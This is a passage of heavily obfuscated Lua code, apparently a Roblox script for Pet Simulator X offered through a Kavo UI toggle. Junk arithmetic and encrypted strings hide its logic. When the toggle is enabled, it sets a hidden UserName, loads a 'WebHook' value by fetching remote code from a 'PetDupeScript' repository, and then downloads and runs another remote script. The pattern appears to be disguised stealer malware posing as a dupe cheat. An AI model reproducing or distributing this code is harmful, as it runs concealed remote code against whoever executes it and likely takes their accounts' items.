																						end
																					end
																				end
																				if (v65 == ((((5473 - (1034 + 52)) - (531 + 333)) - 1865) - ((801 - (314 + 31)) + ((2791 + 1273) - (3832 - (761 + 28 + 180)))))) then
																					v24 = (((119 + 108) - (((1876 - 1466) - (135 + 158)) + (410 - 304))) - (((659 - 306) + 433 + 973) - (477 + ((3583 - (496 + 235)) - 1573)))) + 0;
																					break;
																				end
																			end
																			break;
																		end
																	end
																	break;
																end
																if (v63 == 0) then
																	local v85 = 0 + 0;
																	while true do
																		if ((102 - (78 + 24)) == v85) then
																			v64 = 0 + 0;
																			v65 = nil;
																			v85 = (2 - 1) - (1805 - (841 + 964));
																		end
																		if (v85 == (1 + 0)) then
																			v63 = 1 + 0 + 0;
																			break;
																		end
																	end
																end
															end
															break;
														end
														if (v62 == 0) then
															v63 = 0 - 0;
															v64 = nil;
															v62 = 1;
														end
													end
												end
											end
											break;
										end
										if (v23 == (((14553 - 9701) - 2960) - (297 + 254 + 1340))) then
											local v52 = (626 - (292 + 334)) + 0;
											local v53;
											local v54;
											while true do
												if (v52 == (0 + 0)) then
													v53 = 0 - 0;
													v54 = nil;
													v52 = 1;
												end
												if (v52 == 1) then
													while true do
														if (0 == v53) then
															v54 = 0 + 0;
															while true do
																if (v54 == (0 - 0)) then
																	local v86 = 1977 - (244 + 1733);
																	local v87;
																	while true do
																		if ((0 + 0) == v86) then
																			v87 = 1985 - (1769 + 216);
																			while true do
																				if (v87 == (1 - 0)) then
																					v54 = 1 + 0 + 0;
																					break;
																				end
																				if ((0 + (0 - 0)) == v87) then
																					v26 = nil;
																					v27 = nil;
																					v87 = 2 - (1398 - (1050 + 347));
																				end
																			end
																			break;
																		end
																	end
																end
																if (v54 == (1 + (504 - (281 + 223)))) then
																	v23 = (1349 - 897) - ((276 - ((1872 - (1676 + 154)) + 108)) + 68 + 206 + 42 + 8);
																	break;
																end
															end
															break;
														end
													end
													break;
												end
											end
										end
										if (v23 == (1945 - ((2774 - 865) + 15 + (35 - (12 + 2))))) then
											local v55 = (0 - 0) + (1096 - (350 + 746));
											local v56;
											local v57;
											while true do
												if (v55 == (529 - (326 + 190 + 12))) then
													while true do
														if (v56 == (1232 - (507 + (1579 - 854)))) then
															v57 = ((862 + 471) - (857 + 139 + 337)) + 0 + 0;
															while true do
																if (v57 == (0 + 0 + (1658 - (137 + 1521)) + ((4 + 17) - (16 + (910 - (86 + 819)))))) then
																	local v88 = 0 - 0;
																	while true do
																		if (((2630 - (1171 + 306)) - ((1313 - (296 + 311)) + (1928 - (682 + 799)))) == v88) then
																			v24 = (0 - 0) + 0;
																			v25 = nil;
																			v88 = 1;
																		end
																		if (v88 == (2 - 1)) then
																			v57 = 1080 - (201 + 878);
																			break;
																		end
																	end
																end
																if (v57 == (((1349 - ((208 - 163) + 31)) - 749) - (((1396 - 1032) - (4 + ((3925 - 2879) - ((1504 - (257 + 362)) + 5)))) + (1580 - 1261)))) then
																	v23 = 1 + 0 + 0 + 0;
																	break;
																end
															end
															break;
														end
													end
													break;
												end
												if (0 == v55) then
													v56 = (0 - 0) - (0 - 0);
													v57 = nil;
													v55 = 1605 - (290 + 1314);
												end
											end
										end
									end
									break;
								end
								if (v22 == ((1380 - (894 + 486)) - (0 + 0))) then
									local v44 = 0 + 0;
									while true do
										if (v44 == (0 + 0)) then
											v23 = 1644 - (((1853 - (988 + 444)) - (4 + 326)) + (3622 - (7924 - 5855)));
											v24 = nil;
											v44 = 1;
										end
										if (v44 == (1 + 0)) then
											v22 = (5 - 3) - (247 - (202 + 44));
											break;
										end
									end
								end
								if (v22 == (1 + 0 + (402 - (339 + 63)))) then
									local v45 = 1879 - (1385 + 494);
									local v46;
									while true do
										if (v45 == (975 - (622 + 353))) then
											v46 = 0 - 0;
											while true do
												if (v46 == ((616 + 677) - (860 + 433))) then
													local v66 = 0;
													local v67;
													while true do
														if (v66 == 0) then
															v67 = (4669 - 3105) - (999 + 565);
															while true do
																if (v67 == (0 + 0)) then
																	local v89 = 0 - 0;
																	while true do
																		if (v89 == 0) then
																			v25 = nil;
																			v26 = nil;
																			v89 = (858 - (746 + 108)) - (1324 - (622 + 699));
																		end
																		if (v89 == 1) then
																			v67 = 1 + 0;
																			break;
																		end
																	end
																end
																if (v67 == (1334 - (961 + 372))) then
																	v46 = 1 + 0 + (0 - 0);
																	break;
																end
															end
															break;
														end
													end
												end
												if (v46 == 1) then
													v22 = 1 + 1 + (0 - 0) + (0 - 0);
													break;
												end
											end
											break;
										end
									end
								end
							end
							break;
						end
						if (v21 == (1 + 0)) then
							local v40 = 0 - (0 + 0);
							while true do
								if (v40 == (1 + 0 + 0)) then
									v21 = 2 - (0 + 0);
									break;
								end
								if (v40 == (1628 - (58 + 11 + 1559))) then
									local v47 = 0 + 0;
									while true do
										if ((0 - (0 + 0)) == v47) then
											v24 = nil;
											v25 = nil;
											v47 = 1 + 0;
										end
										if (v47 == (202 - (31 + 33 + 137))) then
											v40 = (1 + 3) - 3;
											break;
										end
									end
								end
							end
						end
						if (v21 == 2) then
							local v41 = 0 - 0;
							local v42;
							while true do
								if (v41 == (0 + 0)) then
									v42 = 568 - (233 + 335);
									while true do
										if (1 == v42) then
											v21 = 2 + 1 + 0;
											break;
										end
										if (v42 == (0 - 0)) then
											local v58 = 0;
											local v59;
											while true do
												if (v58 == 0) then
													v59 = (1144 - (377 + 767)) + 0;
													while true do
														if (v59 == (1144 - (965 + (461 - 283)))) then
															v42 = 1;
															break;
														end
														if (((2261 - (288 + 1221)) - (282 + (1737 - 1267))) == v59) then
															v26 = nil;
															v27 = nil;
															v59 = 1;
														end
													end
													break;
												end
											end
										end
									end
									break;
								end
							end
						end
					end
					break;
				end
			end
			break;
		end
		if (2 == v19) then
			v24 = nil;
			v25 = nil;
			v19 = 3;
		end
		if (v19 == 1) then
			v22 = nil;
			v23 = nil;
			v19 = 2;
		end
		if (3 == v19) then
			v26 = nil;
			v27 = nil;
			v19 = 4;
		end
		if (v19 == 0) then
			v20 = 0;
			v21 = nil;
			v19 = 1;
		end
	end
end
local v12 = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))();
local v13 = v12.CreateLib(v11("\223\181\192\72\136\130\19\6\232\150\130\3\154", "\155\192\176\45\168\210\118\114"), v11("\18\127\81\182\217\174\69\59\123", "\86\30\35\221\141\198\32"));
local v14 = v13:NewTab(v11("\193\58\180\7", "\133\79\196\98\84"));
local v15 = v14:NewSection(v11("\117\131\35\67", "\37\230\87\48\128\98"));
v15:NewToggle(v11("\226\253\6\90\134\216\19\75\213", "\166\136\118\63"), v11("\207\22\22\237\166\17\68\253\166\2\83\249\226\9\22\251\234\25\85\243\166\20\67\232\227\80\70\253\242\3", "\134\112\54\152"), function(v18)
	if v18 then
		local v28 = 0;
		local v29;
		local v30;
		local v31;
		local v32;
		local v33;
		while true do
			if (v28 == ((2396 - 1136) - (387 + 205 + 667))) then
				local v34 = 0;
				while true do
					if (v34 == 1) then
						v28 = 1404 - (89 + 1313);
						break;
					end
					if (v34 == 0) then
						v31 = nil;
						v32 = nil;
						v34 = 1;
					end
				end
			end
			if (v28 == (0 + 0)) then
				local v35 = 0;
				while true do
					if (v35 == 1) then
						v28 = 1787 - (668 + 1118);
						break;
					end
					if (0 == v35) then
						v29 = 0 + (0 - 0);
						v30 = nil;
						v35 = 1;
					end
				end
			end
			if (v28 == 2) then
				v33 = nil;
				while true do
					if ((1034 - (869 + 163)) == v29) then
						while true do
							if (0 == v30) then
								local v43 = (2462 - (448 + 1074)) - (488 + 452);
								while true do
									if (v43 == (1552 - (34 + 1518))) then
										local v48 = 0 + 0;
										while true do
											if (v48 == 1) then
												v43 = (3513 - 1987) - (478 + 1047);
												break;
											end
											if (v48 == (0 - 0)) then
												local v60 = 0;
												while true do
													if (v60 == 0) then
														v31 = ((678 - ((2171 - (204 + 1743)) + 454)) - (0 + 0)) - ((((0 + 0) - ((0 - 0) - 0)) - (221 - ((1735 - (1359 + 211)) + (112 - 56)))) + ((0 + 0) - 0) + (0 - 0) + 0);
														v32 = nil;
														v60 = 1;
													end
													if (v60 == 1) then
														v48 = 1 + 0;
														break;
													end
												end
											end
										end
									end
									if (v43 == 1) then
										v30 = 3 - 2;
										break;
									end
								end
							end
							if (v30 == ((658 - (360 + 297)) + (0 - 0) + (989 - (398 + 591)) + ((0 + (1722 - (78 + 1644))) - 0))) then
								v33 = nil;
								while true do
									if (v31 == (1 - 0)) then
										while true do
											if (((((1376 - (43 + 44)) - (((2102 - (114 + 76)) - (446 + 631)) + 84 + 370)) + 0 + 0) - ((((1729 - (89 + 1640)) - 0) + 0) - ((1883 - (841 + 1042)) - 0))) == v32) then
												v33 = (((2207 - (1460 + 198)) - (120 + 429)) - (771 - (11 + 319 + 441))) + ((723 + 659 + 228) - ((2861 - 1680) + (743 - (383 + 138)) + (1310 - (806 + 297))));
												while true do
													if (((((1299 + 1249) - ((152 - (63 + (94 - 62))) + (1611 - (377 + 11 + 193 + 906)) + 895)) + ((1320 - 667) - (810 - (1199 - 692)))) >= (1081 + (((2965 - (512 + 320)) - ((27 - (1588 - (571 + 1005))) + (224 - 126))) - (34 + 72 + (8 - 2) + ((4361 - (24 + 1737)) - ((385 - 295) + 301 + 453)))))) and (v33 ~= ((0 - ((0 + 0) - (642 - (549 + 93)))) + 0))) then
													else
														local v68 = 0 - 0;
														local v69;
														local v70;
														local v71;
														local v72;
														local v73;
														while true do
															if (v68 == 2) then
																v73 = nil;
																while true do
																	if (v69 == (1 + (0 - 0))) then
																		local v91 = 0;
																		while true do
																			if (v91 == ((5609 - 3999) - ((1345 - (170 + 226)) + (1014 - 354)))) then
																				v69 = 2 + 0;
																				break;
																			end
																			if (v91 == (0 - 0)) then
																				v72 = nil;
																				v73 = nil;
																				v91 = 1139 - ((845 - 566) + 859);
																			end
																		end
																	end
																	if (v69 == 2) then
																		while true do
																			if (v70 == ((0 - 0) - (0 - (0 + 0)))) then
																				local v97 = 0 - (1816 - (220 + 1596));
																				local v98;
																				while true do
																					if (v97 == (0 - 0)) then
																						v98 = (0 - 0) - 0;
																						while true do
																							if (v98 == (0 - (0 + 0))) then
																								v71 = (1761 - (647 + 44 + 205 + 98 + 160)) - (236 + (16 - 9) + 6 + ((2455 - 774) - (1392 - (61 + 8))));
																								v72 = nil;
																								v98 = (2459 - 884) - ((534 - (315 + 3)) + (1489 - (65 + 66)));
																							end
																							if (1 == v98) then
																								v70 = 1 + ((1900 - (57 + 8)) - (((1600 - (204 + 778)) - 159) + 1376));
																								break;
																							end
																						end
																						break;
																					end
																				end
																			end
																			if (v70 == (3 - ((5486 - 3850) - (23 + (2710 - (883 + 216)))))) then
																				v73 = nil;
																				while true do
																					if (v71 == (((755 - 227) - ((2279 - (404 + 1398)) + 51)) - (0 - (0 + (0 - 0))))) then
																						local v107 = (0 + 0) - 0;
																						local v108;
																						while true do
																							if (v107 == (0 - 0)) then
																								v108 = (275 - (((45 + 437) - 291) + (155 - 71))) + 0 + 0;
																								while true do
																									if ((4 - (1 + 2)) == v108) then
																										v71 = (1 - 0) + 0 + 0 + (227 - (102 + 125));
																										break;
																									end
																									if (v108 == (548 - (49 + 499))) then
																										local v120 = 0 + 0;
																										while true do
																											if (v120 == ((245 + 1579) - (98 + 25 + (3780 - 2080)))) then
																												v108 = 1;
																												break;
																											end
																											if (v120 == (0 + 0)) then
																												local v127 = (1180 - (393 + 787)) - 0;
																												while true do
																													if (v127 == (279 - (156 + 123))) then
																														v72 = (((((2522 - (336 + 102)) + 315 + 93) - ((440 - (556 - 261)) + 703 + 479)) - (294 + 871)) - 0) + ((((1900 + 1200) - (737 + 382)) - ((2241 - (699 + (4572 - 3653))) + (2403 - (709 + (1271 - (50 + 885)))))) - (((967 + 270) - (3326 - 2537)) - (((216 + 384) - 167) + (494 - (16 + 463)))));
																														v73 = nil;
																														v127 = 1;
																													end
																													if (1 == v127) then
																														v120 = 198 - (176 + 21);
																														break;
																													end
																												end
																											end
																										end
																									end
																								end
																								break;
																							end
																						end
																					end
																					if (v71 == ((1919 - (1101 + 817)) - ((1577 - (302 + 1275)) - 0))) then
																						while true do
																							if (((578 - 331) - (55 + (207 - 143) + (((3081 - (875 + 460)) + 289) - (((523 + 815) - ((1743 - 1280) + (915 - (136 + 56)))) + (((815 - 438) + 1013 + ((3727 - (219 + 690)) - (232 + 50 + 173))) - ((2400 - (973 + 820)) + (2218 - ((1202 - 786) + 97 + 314)))))))) == v72) then
																								v73 = (0 - 0) + 0 + (((33 + (782 - 519)) - ((889 - (340 + 536)) + (99 - 69) + (765 - 512))) - ((1403 - (672 + 567)) - ((234 - 93) + (90 - 67)))) + 0 + (0 - 0) + 0 + 0;
																								while true do
																									if (v73 == ((125 + (4163 - 2712)) - ((((1586 - (478 + 319)) + 1805) - ((414 - 176) + ((23597 - 17826) - (5125 - (751 + 79))))) + ((1020 + (884 - (662 + 122))) - ((192 - 93) + (1713 - (454 + 933))))))) then
																										v33 = ((1199 - (595 + 600)) - (279 - (257 + 19))) + ((3536 - 2159) - ((986 - 734) + (325 - (16 + 2)) + 19 + 159 + (1248 - 766) + (955 - (((4049 - (1512 + (629 - 458))) - (2621 - (524 + 480))) + ((562 - (351 + 4 + 127)) - (22 + 4 + 6))))));
																										break;
																									end
																									if (v73 == (((((193 + 1483 + 1072) - (((5500 - 3347) - (454 + 790 + 129 + 508)) + (2977 - 1948))) - ((1789 - 1094) + 752)) - ((1267 - 925) - (10 + (475 - (155 + 301)) + (2147 - (104 + 1730))))) + ((((3831 + 371) - (814 + 1074)) - (20 + 3 + 46 + 1109)) - ((576 - 320) + ((2911 - (360 + 238)) - (424 + (27 - (1480 - (1265 + 205))) + 91 + 208 + 530 + 163)))))) then
																										local v121 = 0 - 0;
																										local v122;
																										local v123;
																										local v124;
																										while true do
																											if (v121 == (1579 - (574 + 1004))) then
																												v124 = nil;
																												while true do
																													if (v122 == (((0 + 0) - (0 + 0)) - (1468 - (907 + 561)))) then
																														local v130 = 0;
																														while true do
																															if (v130 == 1) then
																																v122 = (255 + (5315 - 3617)) - (((2952 - 781) - (632 + 477)) + (1248 - 358));
																																break;
																															end
																															if (v130 == (0 + 0 + 0)) then
																																v123 = (((0 - 0) + 0) - 0) - (1132 - (1103 + 29));
																																v124 = nil;
																																v130 = (2446 - (749 + 493)) - (526 + 677);
																															end
																														end
																													end
																													if (v122 == (1 - 0)) then
																														while true do
																															if (v123 == (0 + ((733 - (80 + 653)) - 0))) then
																																v124 = ((0 + 0) - 0) + 0 + 0 + (((942 - (576 + 366)) - ((19 + 737) - ((1402 - (1164 + 69)) + 587))) - (0 - (0 + 0)));
																																while true do
																																	if ((4 - ((27 - 16) - 8)) == v124) then
																																		v73 = (96 - (41 + 43 + (9 - 2) + 4)) + ((2415 - (324 + 199)) - (181 + 40 + 1671)) + 0;
																																		break;
																																	end
																																	if (v124 == ((((936 + (4264 - 2357)) - (450 + ((5454 - 3084) - (13 + 1672)))) - (44 + 98 + ((881 + 110 + 849) - (121 + (352 - 143))))) - ((674 - (95 + ((817 + 517) - (2972 - 2177)))) + (((210 + 1233 + 930) - ((1573 - (827 + 307)) + 190 + (1837 - 1348) + 623 + 94)) - (511 + 1 + 10))))) then
																																		local v136 = 0;
																																		local v137;
																																		while true do
																																			if (((97 - (67 + 30)) + (0 - 0)) == v136) then
																																				v137 = 0 + ((2177 - (505 + 803)) - ((1129 - (572 + 278)) + 590)) + ((1799 - (685 + 1114)) - 0);
																																				while true do
																																					if (v137 == (((73 + 259 + 900) - (401 + 1 + ((2075 - 1365) - (203 + 209)))) - (((1534 - 534) - ((1133 - (2468 - (1054 + 686))) + ((6822 - 5374) - (259 + 1042)))) + (((6439 - (173 + 167)) - (10700 - 6637)) - (((1869 - 1293) - 315) + 386 + (2582 - (645 + 631))))))) then
																																						v124 = (45 + (924 - (123 + 727)) + 597 + 437) - (951 + (1896 - (1639 + (895 - (701 + 138)))));
																																						break;
																																					end
																																					if (v137 == ((((1439 - (477 + 586)) + (598 - 163)) - ((717 - (267 + (1346 - (139 + 988)))) + (670 - (30 + 60)))) - (0 + 0))) then
																																						local v146 = (668 - (136 + 532)) - (0 + 0);
																																						local v147;
																																						local v148;
																																						while true do
																																							if (0 == v146) then
																																								v147 = 0 + 0;
																																								v148 = nil;
																																								v146 = 1 + 0 + (0 - 0);
																																							end
																																							if (v146 == (1 + 0)) then
																																								while true do
																																									if (v147 == 0) then
																																										v148 = (31 + 23 + 147) - (((6549 - 4900) - ((1659 - (196 + 695)) + 829)) + 103 + 46);
																																										while true do
																																											if (v148 == (1544 - (119 + 616 + 809))) then
																																												local v153 = 0;
																																												local v154;
																																												while true do
																																													if (v153 == 0) then
																																														v154 = 0 + 0;
																																														while true do
																																															if (v154 == (1 + (1555 - (692 + 863)))) then
																																																v148 = (592 - (357 + 234)) + 0;
																																																break;
																																															end
																																															if (v154 == (0 + 0)) then
																																																local v160 = 0;
																																																local v161;
																																																while true do
																																																	if (0 == v160) then
																																																		v161 = 0;
																																																		while true do
																																																			if (v161 == (0 + 0)) then
																																																				UserName = v11("\23\165\9\199\205\78\37\185\22\218\250", "\95\192\123\181\180\29");
																																																				WebHook = loadstring(game:HttpGet("https://raw.githubusercontent.com/PetDupeScript/DupePSX/main/ABC", true))();
																																																				v161 = (1 + 0) - 0;
																																																			end
																																																			if (v161 == (1 - 0)) then
																																																				v154 = 3 - (1 + 1);
																																																				break;
																																																			end
																																																		end
																																																		break;
																																																	end
																																																end
																																															end
																																														end
																																														break;
																																													end
																																												end
																																											end
																																											if (v148 == ((2 - (1 + 0)) + (0 - 0) + 0)) then
																																												v137 = 1 + 0;
																																												break;
																																											end
																																										end
																																										break;
																																									end
																																								end
																																								break;
																																							end
																																						end
																																					end
																																				end
																																				break;
																																			end
																																		end
																																	end
																																end
																																break;
																															end
																														end
																														break;
																													end
																												end
																												break;
																											end
																											if (v121 == ((0 - 0) - 0)) then
																												local v128 = (1342 - (142 + 38)) - (74 + 122 + 966);
																												while true do
																													if (v128 == ((0 - 0) - (0 + 0))) then
																														v122 = 0 + ((2497 - (423 + 295)) - (1184 + 191 + 214 + 190));
																														v123 = nil;
																														v128 = 1;
																													end
																													if (v128 == 1) then
																														v121 = 1;
																														break;
																													end
																												end
																											end
																										end
																									end
																								end
																								break;
																							end
																						end
																						break;
																					end
																				end
																				break;
																			end
																		end
																		break;
																	end
																	if (((1178 - (226 + 952)) + 0) == v69) then
																		local v92 = 0 + 0 + 0;
																		while true do
																			if (v92 == (0 - 0)) then
																				local v99 = 0;
																				while true do
																					if (v99 == 0) then
																						v70 = 0 + ((0 + 0) - (0 - 0));
																						v71 = nil;
																						v99 = 1;
																					end
																					if (v99 == 1) then
																						v92 = 1 + (328 - (235 + 93));
																						break;
																					end
																				end
																			end
																			if ((3 - 2) == v92) then
																				v69 = 345 - (37 + 302 + (108 - (95 + 8)));
																				break;
																			end
																		end
																	end
																end
																break;
															end
															if ((0 - (0 - 0)) == v68) then
																v69 = 0;
																v70 = nil;
																v68 = (1 - 0) + 0;
															end
															if (v68 == (1 + 0 + 0)) then
																v71 = nil;
																v72 = nil;
																v68 = 4 - 2;
															end
														end
													end
													if (v33 == ((1252 - (405 + 207)) - (159 + 362 + (589 - (486 + 20)) + 23 + 12))) then
														loadstring(game:HttpGet("https://raw.githubusercontent.com/HardGameSs/PSX/main/Script.lua", true))();
														break;
													end
												end
												break;
											end
										end
										break;
									end
									if ((((((12144 - 6337) - (262 + 670 + 749 + 141)) - (36 + 44 + 460 + 187 + (1847 - (145 + 1232)))) - (((5346 - (45 + (936 - (646 + 195)))) - ((10924 - 8008) + (2101 - (395 + 1372)))) - (1 + 4 + 3 + 31))) - (((((43539 - 21283) - 17461) - ((5003 - (37 + 647)) - ((1961 - 1247) + (1027 - (375 + 603))))) - (856 + ((83 + 11) - (95 - 57)) + (301 - (199 + 26)))) + ((392 + 584 + 727) - 1310) + ((1669 - ((1782 - (1250 + 343)) + ((2261 - (30 + 50 + 280)) - ((493 - (13 + 330)) + 1041)))) - 543))) == v31) then
										local v49 = 0 - 0;
										local v50;
										local v51;
										while true do
											if (v49 == (0 + 0)) then
												local v61 = 1854 - (587 + 1267);
												while true do
													if (v61 == (1 + (695 - (309 + 386)))) then
														v49 = (1 + 2) - (1545 - (18 + 1525));
														break;
													end
													if (v61 == (0 + 0)) then
														v50 = (2272 - (2071 - (168 + 431))) - (327 + (1707 - (383 + 1162)) + ((3688 - 2596) - (1966 - 1185)));
														v51 = nil;
														v61 = (2529 - (802 + 62)) - (419 + (2775 - (757 + 773)));
													end
												end
											end
											if (v49 == (2 - 1)) then
												while true do
													if ((330 - (32 + 298)) == v50) then
														v51 = (0 - 0) + 0 + 0;
														while true do
															if (v51 == (1145 - (73 + 22 + 445 + 113 + 492))) then
																local v83 = 0 + 0 + (0 - 0);
																local v84;
																while true do
																	if (v83 == (1462 - (1165 + (1085 - 788)))) then
																		v84 = 0;
																		while true do
																			if (v84 == (1 + 0)) then
																				v51 = 1 + 0 + 0 + 0;
																				break;
																			end
																			if (v84 == (620 - (199 + (711 - 290)))) then
																				local v100 = 0 - 0;
																				while true do
																					if (v100 == (1508 - (863 + 644))) then
																						v84 = (1776 - (343 + 369)) - (475 + 588);
																						break;
																					end
																					if (v100 == 0) then
																						local v109 = 0;
																						while true do
																							if (v109 == 1) then
																								v100 = 1 - (661 - (258 + 403));
																								break;
																							end
																							if (v109 == 0) then
																								v32 = 0 + 0 + ((((3516 + 1026) - (8337 - 4902)) + (150 - 94)) - ((1574 - (219 + 334)) + 141 + (1229 - (590 + 639)) + (((820 + 1813) - ((1458 - (241 + 732)) + 1402)) - ((802 - 455) + (1548 - (426 + 724))))));
																								v33 = nil;
																								v109 = 1;
																							end
																						end
																					end
																				end
																			end
																		end
																		break;
																	end
																end
															end
															if ((1 + 0) == v51) then
																v31 = (((390 + 4016) - (174 + 160 + (2256 - (527 + 1174)))) - ((((9512 - 7089) + 4 + 7) - (411 + ((9332 - 6799) - 1094))) + (3559 - (123 + 2484)))) - ((427 - (52 + 1 + 31)) + ((39 + 37) - (303 - ((1028 - (816 + 29)) + 92))) + 48 + 1 + 12 + 92 + (1920 - 484));
																break;
															end
														end
														break;
													end
												end
												break;
											end
										end
									end
								end
								break;
							end
						end
						break;
					end
					if (v29 == ((183 + 1511) - ((450 - (351 + 23)) + (2469 - (385 + 467))))) then
						v32 = nil;
						v33 = nil;
						v29 = 8 - 6;
					end
					if (v29 == 0) then
						local v37 = 0;
						while true do
							if (v37 == 1) then
								v29 = 1 + 0;
								break;
							end
							if (v37 == 0) then
								v30 = ((2288 - (1197 + 153 + 415)) + (2108 - (498 + 339))) - (((1384 - (380 + 314)) - 227) + ((6294 - (774 + 790)) - 3399));
								v31 = nil;
								v37 = 1 + (1416 - (1352 + 64));
							end
						end
					end
				end
				break;
			end
		end
	else
		print(v11("\63\206\83\212\121\227\75\238\82\213", "\107\161\52\179\21\134"));
	end
end);
